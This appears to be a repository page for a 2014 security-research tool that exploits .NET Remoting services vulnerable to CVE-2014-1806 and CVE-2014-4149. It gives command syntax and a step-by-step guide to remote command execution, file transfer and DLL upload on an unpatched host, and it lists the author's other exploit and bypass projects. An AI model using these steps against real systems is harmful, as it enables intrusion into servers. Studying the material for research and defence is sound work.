• Stars
    star
    453
  • Rank 96,573 (Top 2 %)
  • Language
    C#
  • License
    GNU General Publi...
  • Created about 10 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A tool to exploit .NET Remoting Services

ExploitRemotingService (c) 2014 James Forshaw

A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects might work in Mono on *nix.

NOTE: The vulnerable service provided in this repo has intentionally disabled the security fix so that you can test the tools are working. This shouldn't be a common configuration.

Usage Instructions:

ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URI are as follows:
tcp://host:port/ObjName   - TCP connection on host and portname
ipc://channel/ObjName     - Named pipe channel

Options:

  -s, --secure               Enable secure mode
  -p, --port=VALUE           Specify the local TCP port to listen on
  -i, --ipc=VALUE            Specify listening pipe name for IPC channel
      --user=VALUE           Specify username for secure mode
      --pass=VALUE           Specify password for secure mode
      --ver=VALUE            Specify version number for remote, 2 or 4
      --usecom               Use DCOM backchannel instead of .NET remoting
      --remname=VALUE        Specify the remote object name to register
  -v, --verbose              Enable verbose debug output
      --useser               Uses old serialization tricks, only works on
                               full type filter services
      --uselease             Uses new serialization tricks by abusing lease
                               mechanism.
      --nulluri              Don't send the URI header to the server
      --autodir              When useser is specified try and automatically
                               work out the installdir parameter from the
                               server's current directory.
      --installdir=VALUE     Specify the install directory of the service
                               executable to enable full support with useser
  -h, -?, --help

Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd  cmdline                  : Execute a command line process and display stdout
put  localfile remotefile     : Upload a file to the hosting server
get  remotefile localfile     : Download a file from the hosting server
ls   remotedir                : List a remote directory
run  file [args]              : Upload and execute an assembly, calls entry point
user                          : Print the current username
ver                           : Print the OS version
raw base64_object             : Send a raw serialized object to the service

This tool supports exploit both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET remoting service and the port it's listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls to:

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

You can then try the exploit by constructing an appropriate URL. If TCP you can use the URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.

A simple test is to do:

ExploitRemotingService SERVICEURL ver

If successful it should print the OS version of the hosting .NET remoting service. If you get an exception it might be fixed with CVE-2014-1806. At this point try the COM version using:

ExploitRemotingService -usecom SERVICEURL ver

This works best locally but can work remotely if you modify the COM configuration and disable the firewall you should be able to get it to work. If that still doesn't work then it might be an up to date server. Instead you can also try the full serialization version using.

ExploitRemotingService -useser SERVICEURL ls c:\

For this to work the remoting service must be running with full typefilter mode enabled (which is some, especially IPC services). It also only works with the commands ls, put and get. But that should be enough to compromise a box.

ExploitRemotingService -uselease SERVICEURL ls c:\

This mode bypasses low typefilter mode to get serialization tricks to work. It also only works with the commands ls, put and get. But that should be enough to compromise a box.

ExploitRemotingService -uselease -autodir SERVICEURL exec notepad

The autodir option tries to work out the location of the service and will upload a DLL to enable full remoting support including exec.

More Repositories

1

DotNetToJScript

A tool to create a JScript file which loads a .NET v2 assembly from memory.
C#
1,139
star
2

oleviewdotnet

A .net OLE/COM viewer and inspector to merge functionality of OleView and Test Container
C#
984
star
3

blackhat-usa-2022-demos

Demos for the Blackhat USA 2022 talk "Taking Kerberos to the Next Level"
PowerShell
260
star
4

WindowsRpcClients

This respository is a collection of C# class libraries which implement RPC clients for various versions of the Windows Operating System from 7 to Windows 10.
C#
252
star
5

windows-logical-eop-workshop

C
221
star
6

CANAPE.Core

A network proxy library written in C# for .NET Core based on CANAPE
C#
172
star
7

infosec-presentations

A repository of previous info-sec presentations I've presented.
145
star
8

IE11SandboxEscapes

Some example source code for fixed IE11 sandbox escapes.
Objective-C
137
star
9

DeviceGuardBypasses

A repository of some of my Windows 10 Device Guard Bypasses
C#
130
star
10

ExploitDotNetDCOM

A tool to exploit .NET DCOM for EoP and RCE. Is fixed in latest versions of the .NET.
C++
82
star
11

WindowsRuntimeSecurityDemos

Demos for Presentation on Windows Runtime Security
C#
69
star
12

DotNetInteropDemos

A set of demos and a PowerShell module to interact with DotNetInterop.
PowerShell
66
star
13

windows-attacksurface-workshop

Workshop material for a Windows Attack Surface Analysis Workshop
65
star
14

ZeroNights2017

Some sample code from my Zero Nights 2017 presentation.
C++
62
star
15

ExampleChatApplication

A simple example chat application written for .NET Core to learn network protocol analysis.
C#
37
star
16

Zer0Con_2018

Repository for my talk on Desktop Bridge at Zer0Con 2018.
PowerShell
33
star
17

DumpReparsePoints

This is a simple tool to dump all the reparse points on an NTFS volume.
C#
32
star
18

setsidmapping

Simple tool to use LsaManageSidNameMapping get LSA to add or remove SID to name mappings.
C#
22
star
19

44con_2014

Materials for 44con 2014 CANAPE Workshop
Python
22
star
20

SuperFunkyChat

An example binary protocol application for learning CANAPE
C#
19
star
21

bh2014

Built binaries for BH 2014 workshop
Python
18
star
22

AxHell

A simple exploitable ActiveX control for RE/VR
C++
18
star
23

canape-ssl-mitm-osx

A simple CANAPE extension to exploit iOS/OSX SSL vulnerability
C#
9
star
24

saturndebug

My old old sega saturn debugger, for information purposes
C
6
star
25

re

Some simple reverse engineering resources
Python
5
star
26

prxtool

C
3
star
27

Sourcey-Jack

Simple injection project to convert network connections to SOCKS
C#
3
star
28

psplinkusb

C
2
star
29

Kanjidic-OSX

A project to convert Jim Breen's Kanji Dictionary to the OSX dictionary.app format
1
star